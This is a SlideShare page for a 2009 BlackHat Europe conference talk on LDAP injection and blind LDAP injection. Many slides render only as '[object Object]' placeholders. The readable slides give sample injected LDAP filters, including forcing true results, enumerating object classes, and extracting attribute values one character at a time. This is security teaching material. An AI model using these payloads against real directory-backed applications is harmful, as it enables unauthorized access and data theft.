SlideShare a Scribd company logo

LDAP Injection & Blind LDAP Injection

Download as PPT, PDF
Chema Alonso
Chema Alonso

This talk was delivered in BlackHat Europe 2009 by Chema Alonso & José Parada.

1 of 50
Testing WebApps in a OpenLDAP & ADAM environmet Chema Alonso – [email_address] Microsoft MVP Corporate Security Security Consultant – Informática64 http://www.informatica64.com
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
 
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
 
Login Process in a Webapp
Login Process in a Webapp
Elevation of Privileges in an unsecure WebApp
Elevation of Privileges in an unsecure WebApp
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
 
Accessing data in an unsecure WebApp
Accessing data in an unsecure WebApp
[object Object],[object Object],[object Object],[object Object],[object Object]
Example: (& (objectClass=printer)(type=HP LaserJet 2100)) Injection to obtain the TRUE result: (&(objectClass=printer)(type=HP LaserJet 2100) (objectClass=*) ) Injections to obtain the objectClass values: (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=logins) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=docs) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=news) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=adms) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=users) ) … .
 
Discovering attributes in a unsecure WebApp Attribute NOT exists (or there is not access privilege)
Discovering attributes in a unsecure WebApp Attribute exists (and there is access privilege)
[object Object],[object Object],[object Object],[object Object]
[object Object],Low index: 1 – High index: 10 – Middle value: 5 (&(objectClass= *)(uid=jparada)(salary>=5) ) ->FALSE Low index: 1 – High index: 5 – Middle value: 2 (&(objectClass= *)(uid=jparada)(salary>=2) ) ->TRUE Low index: 2 – High index: 5 – Middle value: 3 (&(objectClass= *)(uid=jparada)(salary>=3) ) ->TRUE Low index: 3 – High index: 5 – Middle value: 4 (&(objectClass= *)(uid=jparada)(salary>=4) ) ->FALSE Low index: 4 – High index: 4 – Middle value: 4 Salary=4 [million of € per month]
Injections to obtain department values using data booleanization: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=a*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=b*) )-> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=c*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=f*) )->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fa*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fb*) ) -> FALSE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=fi*) )->TRUE
 
Data Booleanization in an unsecure WebApp False
Data Booleanization in an unsecure WebApp True
Data Booleanization in an unsecure WebApp False
Data Booleanization in an unsecure WebApp True
Injections to obtain charset used for store data in a attribute: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*a*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*b*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*c*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*f*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*g*) )->FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*h*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*i*) ) ->TRUE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=*z*) )->TRUE
 
Charset Reduction in an unsecure WebApp False
Charset Reduction in an unsecure WebApp True
[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Recommended

Secure Code Warrior - LDAP injection
Secure Code Warrior - LDAP injectionSecure Code Warrior - LDAP injection
Secure Code Warrior - LDAP injectionSecure Code Warrior
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Apache web-server-architecture
Apache web-server-architectureApache web-server-architecture
Apache web-server-architectureIvanGeorgeArouje
 
3 Level Architecture
3 Level Architecture3 Level Architecture
3 Level ArchitectureAdeel Rasheed
 
Firewall and its purpose
Firewall and its purposeFirewall and its purpose
Firewall and its purposeRohit Phulsunge
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP InjectionNSConclave
 
OS Database Security Chapter 6
OS Database Security Chapter 6OS Database Security Chapter 6
OS Database Security Chapter 6AfiqEfendy Zaen
 

Recommended

Secure Code Warrior - LDAP injection
Secure Code Warrior - LDAP injectionSecure Code Warrior - LDAP injection
Secure Code Warrior - LDAP injectionSecure Code Warrior
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Apache web-server-architecture
Apache web-server-architectureApache web-server-architecture
Apache web-server-architectureIvanGeorgeArouje
 
3 Level Architecture
3 Level Architecture3 Level Architecture
3 Level ArchitectureAdeel Rasheed
 
Firewall and its purpose
Firewall and its purposeFirewall and its purpose
Firewall and its purposeRohit Phulsunge
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP InjectionNSConclave
 
OS Database Security Chapter 6
OS Database Security Chapter 6OS Database Security Chapter 6
OS Database Security Chapter 6AfiqEfendy Zaen
 
Intrusion Detection Presentation
Intrusion Detection PresentationIntrusion Detection Presentation
Intrusion Detection PresentationMustafash79
 
Network Security Goals
Network Security GoalsNetwork Security Goals
Network Security GoalsKabul Education University
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Network Security Topic 1 intro
Network Security Topic 1 introNetwork Security Topic 1 intro
Network Security Topic 1 introKhawar Nehal khawar.nehal@atrc.net.pk
 
Network Access Control (NAC)
Network Access Control (NAC)Network Access Control (NAC)
Network Access Control (NAC)Forescout Technologies Inc
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
DBMS - Relational Model
DBMS - Relational ModelDBMS - Relational Model
DBMS - Relational ModelOvais Imtiaz
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
DB security
DB security DB security
DB securityERSHUBHAM TIWARI
 
Broken Authentication and Authorization(1).pptx
Broken Authentication and Authorization(1).pptxBroken Authentication and Authorization(1).pptx
Broken Authentication and Authorization(1).pptxManahari Darshika Pemarathna
 
Relational model
Relational modelRelational model
Relational modelDabbal Singh Mahara
 
Introduction to structured query language (sql)
Introduction to structured query language (sql)Introduction to structured query language (sql)
Introduction to structured query language (sql)Sabana Maharjan
 
radius dhcp dot1.x (802.1x)
radius dhcp dot1.x (802.1x)radius dhcp dot1.x (802.1x)
radius dhcp dot1.x (802.1x)rinnocente
 
Protection and Security in Operating Systems
Protection and Security in Operating SystemsProtection and Security in Operating Systems
Protection and Security in Operating Systemsvampugani
 
Ldap intro
Ldap introLdap intro
Ldap introyousry ibrahim
 
Potential Impact of Cyber Attacks on Critical Infrastructure
Potential Impact of Cyber Attacks on Critical InfrastructurePotential Impact of Cyber Attacks on Critical Infrastructure
Potential Impact of Cyber Attacks on Critical InfrastructureUnisys Corporation
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Network security
Network security Network security
Network securityVikas Jagtap
 
Data Centre Design for Canadian Small & Medium Sized Businesses
Data Centre Design for Canadian Small & Medium Sized BusinessesData Centre Design for Canadian Small & Medium Sized Businesses
Data Centre Design for Canadian Small & Medium Sized BusinessesCisco Canada
 
Database security
Database securityDatabase security
Database securitySoftware Engineering
 
Spark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupSpark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupDatabricks
 
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...DataWorks Summit
 

More Related Content

What's hot

Intrusion Detection Presentation
Intrusion Detection PresentationIntrusion Detection Presentation
Intrusion Detection PresentationMustafash79
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
DBMS - Relational Model
DBMS - Relational ModelDBMS - Relational Model
DBMS - Relational ModelOvais Imtiaz
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Introduction to structured query language (sql)
Introduction to structured query language (sql)Introduction to structured query language (sql)
Introduction to structured query language (sql)Sabana Maharjan
 
radius dhcp dot1.x (802.1x)
radius dhcp dot1.x (802.1x)radius dhcp dot1.x (802.1x)
radius dhcp dot1.x (802.1x)rinnocente
 
Protection and Security in Operating Systems
Protection and Security in Operating SystemsProtection and Security in Operating Systems
Protection and Security in Operating Systemsvampugani
 
Potential Impact of Cyber Attacks on Critical Infrastructure
Potential Impact of Cyber Attacks on Critical InfrastructurePotential Impact of Cyber Attacks on Critical Infrastructure
Potential Impact of Cyber Attacks on Critical InfrastructureUnisys Corporation
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Data Centre Design for Canadian Small & Medium Sized Businesses
Data Centre Design for Canadian Small & Medium Sized BusinessesData Centre Design for Canadian Small & Medium Sized Businesses
Data Centre Design for Canadian Small & Medium Sized BusinessesCisco Canada
 

What's hot (20)

Intrusion Detection Presentation
Intrusion Detection PresentationIntrusion Detection Presentation
Intrusion Detection Presentation
 
Network Security Goals
Network Security GoalsNetwork Security Goals
Network Security Goals
 
Sql injection
Sql injectionSql injection
Sql injection
 
Network Security Topic 1 intro
Network Security Topic 1 introNetwork Security Topic 1 intro
Network Security Topic 1 intro
 
Network Access Control (NAC)
Network Access Control (NAC)Network Access Control (NAC)
Network Access Control (NAC)
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
DBMS - Relational Model
DBMS - Relational ModelDBMS - Relational Model
DBMS - Relational Model
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
DB security
DB security DB security
DB security
 
Broken Authentication and Authorization(1).pptx
Broken Authentication and Authorization(1).pptxBroken Authentication and Authorization(1).pptx
Broken Authentication and Authorization(1).pptx
 
Relational model
Relational modelRelational model
Relational model
 
Introduction to structured query language (sql)
Introduction to structured query language (sql)Introduction to structured query language (sql)
Introduction to structured query language (sql)
 
radius dhcp dot1.x (802.1x)
radius dhcp dot1.x (802.1x)radius dhcp dot1.x (802.1x)
radius dhcp dot1.x (802.1x)
 
Protection and Security in Operating Systems
Protection and Security in Operating SystemsProtection and Security in Operating Systems
Protection and Security in Operating Systems
 
Ldap intro
Ldap introLdap intro
Ldap intro
 
Potential Impact of Cyber Attacks on Critical Infrastructure
Potential Impact of Cyber Attacks on Critical InfrastructurePotential Impact of Cyber Attacks on Critical Infrastructure
Potential Impact of Cyber Attacks on Critical Infrastructure
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
Network security
Network security Network security
Network security
 
Data Centre Design for Canadian Small & Medium Sized Businesses
Data Centre Design for Canadian Small & Medium Sized BusinessesData Centre Design for Canadian Small & Medium Sized Businesses
Data Centre Design for Canadian Small & Medium Sized Businesses
 
Database security
Database securityDatabase security
Database security
 

Similar to LDAP Injection & Blind LDAP Injection

Spark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupSpark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupDatabricks
 
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...DataWorks Summit
 
Introduction to apex
Introduction to apexIntroduction to apex
Introduction to apexRinku Saini
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperE Hacking
 
UnderstandingLDAP.ppt
UnderstandingLDAP.pptUnderstandingLDAP.ppt
UnderstandingLDAP.pptEfrizal Zaida
 
Apache Spark Workshop, Apr. 2016, Euangelos Linardos
Apache Spark Workshop, Apr. 2016, Euangelos LinardosApache Spark Workshop, Apr. 2016, Euangelos Linardos
Apache Spark Workshop, Apr. 2016, Euangelos LinardosEuangelos Linardos
 
Import web resources using R Studio
Import web resources using R StudioImport web resources using R Studio
Import web resources using R StudioRupak Roy
 
Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)Igor Moochnick
 
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...Provectus
 
Hack-Proof Your Drupal App
Hack-Proof Your Drupal AppHack-Proof Your Drupal App
Hack-Proof Your Drupal AppErich Beyrent
 
The Power of Relationships in Your Big Data
The Power of Relationships in Your Big DataThe Power of Relationships in Your Big Data
The Power of Relationships in Your Big DataPaulo Fagundes
 
Oracle NoSQL Database release 3.0 overview
Oracle NoSQL Database release 3.0 overviewOracle NoSQL Database release 3.0 overview
Oracle NoSQL Database release 3.0 overviewDave Segleau
 
Seattle spark-meetup-032317
Seattle spark-meetup-032317Seattle spark-meetup-032317
Seattle spark-meetup-032317Nan Zhu
 
Sql Summit Clr, Service Broker And Xml
Sql Summit Clr, Service Broker And XmlSql Summit Clr, Service Broker And Xml
Sql Summit Clr, Service Broker And XmlDavid Truxall
 
OGSA-DAI DQP: A Developer's View
OGSA-DAI DQP: A Developer's ViewOGSA-DAI DQP: A Developer's View
OGSA-DAI DQP: A Developer's ViewBartosz Dobrzelecki
 
Modern Database Development Oow2008 Lucas Jellema
Modern Database Development Oow2008 Lucas JellemaModern Database Development Oow2008 Lucas Jellema
Modern Database Development Oow2008 Lucas JellemaLucas Jellema
 
Tackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy ApplicationsTackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy ApplicationsKonveyor Community
 

Similar to LDAP Injection & Blind LDAP Injection (20)

Spark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark MeetupSpark SQL Deep Dive @ Melbourne Spark Meetup
Spark SQL Deep Dive @ Melbourne Spark Meetup
 
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
Introduction to Apache Amaterasu (Incubating): CD Framework For Your Big Data...
 
Introduction to apex
Introduction to apexIntroduction to apex
Introduction to apex
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections Paper
 
UnderstandingLDAP.ppt
UnderstandingLDAP.pptUnderstandingLDAP.ppt
UnderstandingLDAP.ppt
 
Ldap
LdapLdap
Ldap
 
Apache Spark Workshop, Apr. 2016, Euangelos Linardos
Apache Spark Workshop, Apr. 2016, Euangelos LinardosApache Spark Workshop, Apr. 2016, Euangelos Linardos
Apache Spark Workshop, Apr. 2016, Euangelos Linardos
 
Import web resources using R Studio
Import web resources using R StudioImport web resources using R Studio
Import web resources using R Studio
 
Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)Ado.Net Data Services (Astoria)
Ado.Net Data Services (Astoria)
 
Mist - Serverless proxy to Apache Spark
Mist - Serverless proxy to Apache SparkMist - Serverless proxy to Apache Spark
Mist - Serverless proxy to Apache Spark
 
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
Data Summer Conf 2018, “Mist – Serverless proxy for Apache Spark (RUS)” — Vad...
 
Hack-Proof Your Drupal App
Hack-Proof Your Drupal AppHack-Proof Your Drupal App
Hack-Proof Your Drupal App
 
The Power of Relationships in Your Big Data
The Power of Relationships in Your Big DataThe Power of Relationships in Your Big Data
The Power of Relationships in Your Big Data
 
Oracle NoSQL Database release 3.0 overview
Oracle NoSQL Database release 3.0 overviewOracle NoSQL Database release 3.0 overview
Oracle NoSQL Database release 3.0 overview
 
Seattle spark-meetup-032317
Seattle spark-meetup-032317Seattle spark-meetup-032317
Seattle spark-meetup-032317
 
Sql Summit Clr, Service Broker And Xml
Sql Summit Clr, Service Broker And XmlSql Summit Clr, Service Broker And Xml
Sql Summit Clr, Service Broker And Xml
 
OGSA-DAI DQP: A Developer's View
OGSA-DAI DQP: A Developer's ViewOGSA-DAI DQP: A Developer's View
OGSA-DAI DQP: A Developer's View
 
Modern Database Development Oow2008 Lucas Jellema
Modern Database Development Oow2008 Lucas JellemaModern Database Development Oow2008 Lucas Jellema
Modern Database Development Oow2008 Lucas Jellema
 
Tackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy ApplicationsTackle Containerization Advisor (TCA) for Legacy Applications
Tackle Containerization Advisor (TCA) for Legacy Applications
 
LDAP
LDAPLDAP
LDAP
 

More from Chema Alonso

CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitChema Alonso
 
Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Chema Alonso
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoChema Alonso
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataChema Alonso
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...Chema Alonso
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarChema Alonso
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with TacytChema Alonso
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordChema Alonso
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Chema Alonso
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of MagicChema Alonso
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackersChema Alonso
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Chema Alonso
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIChema Alonso
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismoChema Alonso
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?Chema Alonso
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalChema Alonso
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con PythonChema Alonso
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsChema Alonso
 

More from Chema Alonso (20)

CyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging FruitCyberCamp 2015: Low Hanging Fruit
CyberCamp 2015: Low Hanging Fruit
 
Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en Magento
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
 
Dorking & Pentesting with Tacyt
Dorking & Pentesting with TacytDorking & Pentesting with Tacyt
Dorking & Pentesting with Tacyt
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWord
 
Foca API v0.1
Foca API v0.1Foca API v0.1
Foca API v0.1
 
Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7Recuperar dispositivos de sonido en Windows Vista y Windows 7
Recuperar dispositivos de sonido en Windows Vista y Windows 7
 
It's a Kind of Magic
It's a Kind of MagicIt's a Kind of Magic
It's a Kind of Magic
 
Ingenieros y hackers
Ingenieros y hackersIngenieros y hackers
Ingenieros y hackers
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
El juego es el mismo
El juego es el mismoEl juego es el mismo
El juego es el mismo
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Shuabang Botnet
Shuabang BotnetShuabang Botnet
Shuabang Botnet
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu Windows
 

LDAP Injection & Blind LDAP Injection

  • 1. Testing WebApps in a OpenLDAP & ADAM environmet Chema Alonso – [email_address] Microsoft MVP Corporate Security Security Consultant – Informática64 http://www.informatica64.com
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.  
  • 17.
  • 18.  
  • 19. Login Process in a Webapp
  • 20. Login Process in a Webapp
  • 21. Elevation of Privileges in an unsecure WebApp
  • 22. Elevation of Privileges in an unsecure WebApp
  • 23.
  • 24.  
  • 25. Accessing data in an unsecure WebApp
  • 26. Accessing data in an unsecure WebApp
  • 27.
  • 28. Example: (& (objectClass=printer)(type=HP LaserJet 2100)) Injection to obtain the TRUE result: (&(objectClass=printer)(type=HP LaserJet 2100) (objectClass=*) ) Injections to obtain the objectClass values: (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=logins) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=docs) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=news) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=adms) ) (&(objectClass=printer)(type= HP LaserJet 2100)(objectClass=users) ) … .
  • 29.  
  • 30. Discovering attributes in a unsecure WebApp Attribute NOT exists (or there is not access privilege)
  • 31. Discovering attributes in a unsecure WebApp Attribute exists (and there is access privilege)
  • 32.
  • 33.
  • 34.
  • 35.
  • 36. Injections to obtain department values using data booleanization: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=a*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=b*) )-> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=c*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=f*) )->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fa*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=fb*) ) -> FALSE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=fi*) )->TRUE
  • 37.  
  • 38. Data Booleanization in an unsecure WebApp False
  • 39. Data Booleanization in an unsecure WebApp True
  • 40. Data Booleanization in an unsecure WebApp False
  • 41. Data Booleanization in an unsecure WebApp True
  • 42. Injections to obtain charset used for store data in a attribute: (&(objectClass=printer)(type= HP LaserJet 2100)(department=*a*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*b*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*c*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*d*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*e*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*f*) ) ->TRUE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*g*) )->FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*h*) ) -> FALSE (&(objectClass=printer)(type= HP LaserJet 2100)(department=*i*) ) ->TRUE … . (&(objectClass=printer)(type= HP LaserJet 2100)(department=*z*) )->TRUE
  • 43.  
  • 44. Charset Reduction in an unsecure WebApp False
  • 45. Charset Reduction in an unsecure WebApp True
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.